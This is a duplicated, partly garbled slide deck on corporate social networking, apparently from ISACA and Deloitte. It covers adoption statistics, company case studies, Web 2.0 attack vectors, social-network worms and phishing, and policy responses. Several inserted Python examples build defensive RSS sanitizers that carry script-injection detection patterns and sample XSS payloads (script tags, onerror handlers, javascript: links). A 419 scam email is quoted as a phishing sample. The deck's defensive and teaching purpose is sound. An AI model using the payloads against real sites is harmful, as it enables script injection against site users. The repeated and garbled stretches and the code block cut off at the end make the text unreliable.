• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues
Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings
Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents
www.isaca.org 26
Foster creativity, innovation and collaboration (cont.)
• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees. https://mix.blueshirtnation.com
www.isaca.org 27
Foster creativity, innovation and collaboration (cont.)
• Deloitte's DStreet
  – Enterprise talent networking site – changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team
As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
www.isaca.org 28
Enhance customer and partner relationships
• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allows customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception
• Provides a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allows consumers who know your products and services best to become a part of the new offering development process
Revenue growth
• A major consumer goods company improved sales by 31.5% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value
www.isaca.org 29
Enhance customer and partner relationships (cont.)
• Procter & Gamble
  – Capessa launched in the "Yahoo Health" section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com
www.isaca.org 30
Enhance customer and partner relationships (cont.)
• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com
www.isaca.org 31
Enhance customer and partner relationships (cont.)
• State of Louisville, Kentucky
  – Interactive audit findings on Web site. Allows the users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit
www.isaca.org 32
Enhance customer and partner relationships (cont.)
• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com
www.isaca.org 33
Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest update
www.isaca.org 34
Risks and challenges
www.isaca.org 35
Risks and challenges
• Farmers and Mobsters
  – Top Facebook Applications
    • Source - http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform
Rank | Name                  | Monthly Active Users
   1 | FarmVille             | 82,580,911
   2 | Static FBML           | 46,827,021
   3 | Birthday Cards        | 41,904,049
   4 | Café World            | 30,032,716
   5 | Facebook for iPhone   | 29,438,848
   6 | Texas HoldEm Poker    | 28,332,917
   7 | Slide FunSpace        | 25,630,033
   8 | Happy Aquarium (BETA) | 24,915,971
   9 | Mafia Wars            | 24,704,179
  10 | Causes                | 24,317,292
www.isaca.org 36
Risks and challenges (cont.)
• New security concerns and attack vectors — as a result of the shift in technology through Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients that are enhancing client-end interfaces in the browser itself
• Top 10 Web 2.0 Attack Vectors — http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting ("CSS") in AJAX, e.g. "Samy worm that exploited MySpace.com's CSS flaw"
  – XML poisoning — poison XML blocks coming from AJAX client
  – Malicious AJAX code execution — replay of cookies for each request
  – RSS/Atom injection — inject JavaScripts into the RSS feeds to generate attack on client browser
  – Web Services Definition Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines — fail to perform server-side checks
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP message — bypass authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
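The RSS/Atom injection and XML poisoning vectors listed above land directly on the syndication and mashup tools described earlier in the deck: a mashup page renders feed content from sites it does not control. The following Python check is an added example, not code from the presentation or from any vendor it names; the feed, hostnames and function names are constructed for illustration. It rejects feeds that declare a DOCTYPE, flags items carrying script-capable markup, and reduces each description to escaped plain text before it reaches a page.

```python
import html
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Markup that would let feed content run in the reader's browser once a mashup
# renders it. Patterns are deliberately broad: a flagged item gets reviewed,
# it is never silently trusted.
SCRIPT_CAPABLE = re.compile(r"<\s*/?\s*(script|iframe|object|embed|svg|math)\b", re.I)
EVENT_HANDLER = re.compile(r"\son[a-z]+\s*=", re.I)
JS_URL = re.compile(r"""\b(?:href|src)\s*=\s*['"]?\s*javascript:""", re.I)
ANY_TAG = re.compile(r"<[^>]*>")


@dataclass
class FeedItem:
    title: str
    link: str                      # "" when <link> was not a plain http(s) URL
    text: str                      # description reduced to escaped plain text
    findings: list = field(default_factory=list)


def inspect_markup(raw: str) -> list:
    """Return the reasons a fragment of feed HTML must not be rendered as-is."""
    found = []
    if SCRIPT_CAPABLE.search(raw):
        found.append("script-capable element")
    if EVENT_HANDLER.search(raw):
        found.append("inline event handler")
    if JS_URL.search(raw):
        found.append("javascript: URL")
    return found


def safe_link(url: str) -> str:
    """Keep only absolute http(s) links; javascript:, data: and relative links are dropped."""
    url = url.strip()
    parts = urlsplit(url)
    return url if parts.scheme in ("http", "https") and parts.netloc else ""


def sanitize_feed(xml_text: str) -> list:
    """Parse an RSS 2.0 document from an untrusted site into FeedItems.

    Raises ValueError for feeds that declare a DOCTYPE: that is where entity
    expansion bombs and external entities (the XML poisoning vector) are
    declared, and a syndication feed has no legitimate need for one.
    """
    if re.search(r"<!DOCTYPE", xml_text, re.I):
        raise ValueError("feed declares a DOCTYPE; entity definitions are not accepted")
    root = ET.fromstring(xml_text)
    items = []
    for node in root.iter("item"):
        # ElementTree has already decoded one layer of XML escaping / CDATA;
        # a second html.unescape catches double-encoded payloads.
        raw = html.unescape(node.findtext("description", default=""))
        link = node.findtext("link", default="")
        findings = inspect_markup(raw)
        if link.strip() and not safe_link(link):
            findings.append("non-http link")
        # Strip every tag, then re-escape so the result is inert wherever it lands.
        text = html.escape(ANY_TAG.sub("", raw))
        title = html.escape(node.findtext("title", default=""))
        items.append(FeedItem(title, safe_link(link), text, findings))
    return items


def feed_is_accepted(xml_text: str) -> bool:
    """True when the document passes the structural checks in sanitize_feed()."""
    try:
        sanitize_feed(xml_text)
        return True
    except (ValueError, ET.ParseError):
        return False


# Constructed sample feed (example.com / example.net are documentation hosts):
# one clean item, one with an injected <script>, one using an event handler
# and javascript: URLs.
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Constructed sample feed</title>
<item><title>Quarterly results</title><link>http://example.com/q3</link>
<description>&lt;p&gt;Revenue up &lt;b&gt;8%&lt;/b&gt; this quarter.&lt;/p&gt;</description></item>
<item><title>Free gift card</title><link>http://example.net/promo</link>
<description><![CDATA[Click here <script>alert("injected")</script>]]></description></item>
<item><title>Photos</title><link>javascript:alert(1)</link>
<description>&lt;img src="x" onerror="alert(1)"&gt; &lt;a href="javascript:void(0)"&gt;view&lt;/a&gt;</description></item>
</channel></rss>"""

if __name__ == "__main__":
    for item in sanitize_feed(SAMPLE_FEED):
        status = "FLAGGED: " + ", ".join(item.findings) if item.findings else "ok"
        print(f"{item.title!r}: {status} -> {item.text!r}")
```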
www.isaca.org 37
Risks and challenges (cont.)
• Example worms / phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data
  – Fbaction - Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account
www.isaca.org 38
Risks and challenges (cont.)
  – Boface - convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
• Common element – they all take advantage of the implied trust that social networking users have with each other
www.isaca.org 39
Risks and challenges (cont.)
"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." - Marcus Ranum in InfoSec Magazine, May 2008
• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools
• May also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com, etc.
www.isaca.org 40
Risks and challenges (cont.)
• More on phishing — social networks are a target-rich environment
www.isaca.org 41
Risks and challenges (cont.)
• More on phishing — social networks are a target-rich environment (cont.)
"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School: my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year……" - See http://www.419legal.org for more details
• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
www.isaca.org 42
Risks and challenges (cont.)
• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation — Third-party material such as essays, articles and photographs is used without written consent from the proprietor
• Intellectual property theft — Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium
www.isaca.org 43
Risks and challenges (cont.)
• Failures in the use of social media — most companies that use social media don't approach it the way they would with other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with social media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
"Fully half of all Social Media investments will fail" — Gartner
www.isaca.org 44
Risks and challenges (cont.)
"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'cookie monster sings chocolate rain' about 1,000 times." - Michael Scott from The Office
• Productivity — Users employ social media tools for nonproductive purposes such as socializing ("Social Notworking")
http://news.bbc.co.uk/2/hi/business/8325865.stm
www.isaca.org 45
Risks and challenges (cont.)
• Technical integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with:
    • Facebook
    • Twitter
    • Myspace
    • Yahoo
    • Google
    • Windows Live ID
    • AOL
    • Blogger
    • WordPress
    • Netlog
    • OpenID
    • flickr
www.isaca.org 46
Risks and challenges (cont.)
• Information hoarding — In many industries, value is placed on what an employee knows that others do not know. This belief prevents data sharing
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that — "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user, and summed for all"
  – Or, alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law
www.isaca.org 47
Risks and challenges (cont.)
• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation issues
www.isaca.org 48
A quick word on privacy
"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
— Mark Zuckerberg, Facebook founder
"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
— Eric Schmidt, CEO, Google Inc.
www.isaca.org 49
A quick word on privacy (cont.)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence: limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
Social Networking Companies
Social Media – Popular Examples
• Wikis: Wikitravel, Wikipedia, wikiHow, WikiBooks, the TV IV
• Blogs: livejournal, WordPress, Blogger, Technorati, xanga
• Social Networking: myspace.com, LinkedIn, facebook, friendster, plaxo
• RSS (Really Simple Syndication): newsgator, Bloglines, iGoogle, FeedBurner
• Presence and Microblogging: twitter, Pownce, jaiku, Hictu, tumblr
• Social Bookmarking and Tagging: delicious, digg, reddit, newsvine, StumbleUpon
• Online Photo and Video Sharing: YouTube, flickr, shutterfly, last.fm, slideshare
Why and how companies are using social networking
Statistics on companies using Social Networking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
Statistics on companies using Social Networking (cont.)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
Companies typically adopt Social Media for three major benefits
1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
Increase employee productivity and operational efficiencies
• Creates a lightweight institutional memory system so a company's intellectual assets can be easily captured, stored and accessed
• Reduces the net volume of e-mail and allows users to "pull" information at their convenience, as opposed to spending time reading through mass e-mail chains
• Creates better quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world

Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using Social Media

Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to "about 30 seconds" per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
Increase employee productivity and operational efficiencies (cont.)
• American Red Cross
  – Designed to incite discussions around issues the American Red Cross cares about and to describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and to give valuable information about preventing, preparing for and responding to emergencies
  http://redcrosschat.org
Increase employee productivity and operational efficiencies (cont.)
• Deloitte's DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners, across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte
As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Foster creativity, innovation and collaboration
• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues

Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings

Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents
Foster creativity, innovation and collaboration (cont.)
• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees.
  https://mix.blueshirtnation.com
Foster creativity, innovation and collaboration (cont.)
• Deloitte's DStreet
  – Enterprise talent networking site, changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team
Enhance customer and partner relationships
• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allows customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledge base, while monitoring customer perception
• Provides a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allows consumers who know your products and services best to become a part of the new offering development process

Revenue growth
• A major consumer goods company improved sales by 31.5% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value
Enhance customer and partner relationships (cont.)
• Procter & Gamble
  – Capessa launched in the "Yahoo Health" section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving.
  http://realwomenrealadvice.com
Enhance customer and partner relationships (cont.)
• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs.
  http://www.openforum.com
Enhance customer and partner relationships (cont.)
• State of Louisville, Kentucky
  – Interactive audit findings on the Web site. Allows users to discuss previous audit findings.
  http://www.louisvilleky.gov/InternalAudit
Enhance customer and partner relationships (cont.)
• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books.
  http://www.shelfari.com
Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used twitter to keep in touch with its customers and let them know the latest update.
Risks and challenges
Risks and challenges
• Farmers and Mobsters
  – Top Facebook Applications
• Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
• There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                   Monthly Active Users
1     FarmVille              82,580,911
2     Static FBML            46,827,021
3     Birthday Cards         41,904,049
4     Café World             30,032,716
5     Facebook for iPhone    29,438,848
6     Texas HoldEm Poker     28,332,917
7     Slide FunSpace         25,630,033
8     Happy Aquarium (BETA)  24,915,971
9     Mafia Wars             24,704,179
10    Causes                 24,317,292
Risks and challenges (cont.)
• New security concerns and attack vectors as a result of the shift in technology: Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients that are enhancing client-end interfaces in the browser itself
• Top 10 Web 2.0 attack vectors (http://net-square.com/whitepapers/Top10_Web20_AV.pdf):
  – Cross-site scripting ("CSS") in AJAX, e.g. the "Samy worm that exploited MySpace.com's CSS flaw"
  – XML poisoning: poisoned XML blocks coming from the AJAX client
  – Malicious AJAX code execution: replay of cookies for each request
  – RSS/Atom injection: JavaScript injected into RSS feeds to attack the client browser
  – Web Services Definition Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines that fail to perform server-side checks
  – Web services routing issues: compromise of intermediate nodes
  – Parameter manipulation with SOAP: web services consume information and variables from SOAP
  – XPATH injection in SOAP messages: bypass of authentication mechanisms
  – RIA thick client binary manipulation: issues with session management
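The following Python is an added example, not code from the presentation or from the net-square paper it cites. It shows the server-side defences a syndication mashup needs against three of the vectors listed above: refusing feed documents that carry DTD/entity declarations (XML poisoning), stripping scripts, event handlers and javascript: links from feed HTML (RSS/Atom injection), and validating link schemes on the server rather than in the browser (missing server-side checks). The feed document and its hosts are constructed for the example.

```python
"""Server-side handling of third-party RSS content before a mashup renders it.
Added example, not the presentation's code. Covers three listed vectors: XML
poisoning (DTD/entity declarations refused), RSS/Atom injection (scripts,
event handlers and javascript: links stripped) and missing server-side checks
(link schemes validated here, not in the browser). The feed is constructed."""
import html
import re
import xml.etree.ElementTree as ET
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "br", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}}      # no on* handlers, no style, no src
SAFE_SCHEMES = {"http", "https"}     # rejects javascript:, data:, vbscript:
DTD_MARKER = re.compile(r"<!\s*(DOCTYPE|ENTITY)", re.IGNORECASE)


class FeedHTMLSanitizer(HTMLParser):
    """Allow-list sanitizer: anything not explicitly permitted is dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            return  # tag dropped; its text content is still kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name == "href" and urlparse(value.strip()).scheme not in SAFE_SCHEMES:
                continue  # relative and non-http(s) links are dropped too
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.skip_depth == 0:
            self.out.append(html.escape(data, quote=False))  # re-escape text

    def result(self):
        return "".join(self.out)


def sanitize_html(fragment):
    parser = FeedHTMLSanitizer()
    parser.feed(fragment)
    parser.close()
    return parser.result()


def has_dtd(raw_xml):
    """Feeds never need a DTD; one present signals entity-expansion attacks."""
    return DTD_MARKER.search(raw_xml) is not None


def parse_feed_items(raw_xml, max_items=50, max_title=200):
    """Turn RSS 2.0 <item> elements into render-safe dicts (Atom uses <entry>)."""
    if has_dtd(raw_xml):
        raise ValueError("feed carries a DTD/entity declaration; refusing to parse")
    items = []
    for item in ET.fromstring(raw_xml).iter("item"):
        title = (item.findtext("title") or "").strip()[:max_title]
        link = (item.findtext("link") or "").strip()
        if urlparse(link).scheme not in SAFE_SCHEMES:
            link = ""  # server-side check: never trust the feed's link scheme
        items.append({"title": html.escape(title),
                      "link": html.escape(link, quote=True),
                      "description": sanitize_html(item.findtext("description") or "")})
        if len(items) >= max_items:
            break
    return items


# Constructed feed: item 1 smuggles a script, item 2 a javascript: link and an
# onerror handler, the payloads the RSS/Atom injection vector describes.
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Constructed test feed</title>
<item><title>Quarterly results &lt;b&gt;posted&lt;/b&gt;</title>
<link>https://news.example/q3</link>
<description>&lt;p&gt;Read the &lt;a href="https://news.example/q3"&gt;report&lt;/a&gt;.&lt;/p&gt;&lt;script&gt;document.cookie&lt;/script&gt;</description></item>
<item><title>Click here</title><link>javascript:alert(1)</link>
<description>&lt;a href="javascript:alert(1)" onclick="x()"&gt;prize&lt;/a&gt;&lt;img src=x onerror=alert(1)&gt;</description></item>
</channel></rss>"""

if __name__ == "__main__":
    for entry in parse_feed_items(SAMPLE_FEED):
        print(entry)
```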
Risks and challenges (cont.)
• Example worms and phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data.
  – Fbaction – Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account.
Risks and challenges (cont.)
  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends.
• Common element – they all take advantage of the implied trust that social networking users have with each other
Risks and challenges (cont.)
"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." – Marcus Ranum in InfoSec Magazine, May 2008
• Trust – Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools
• These attacks may also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com, etc.
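As an added example, not part of the presentation, the following Python triages a link the way a defender would before a user follows it: it expands shortened URLs (bit.ly, tr.im, tinyurl.com) to expose the real destination and flags hosts that borrow a brand name without belonging to the brand's domain, the pattern behind the fbaction.net lure above. The redirect table, hosts and brand list are constructed assumptions so that it runs offline.

```python
"""Defensive triage of links received through social networks.
Added example, not the presentation's code. Flags the patterns the slides
describe: URL shorteners that hide the real destination (bit.ly, tr.im,
tinyurl.com) and lookalike hosts that borrow a brand name, as the fbaction.net
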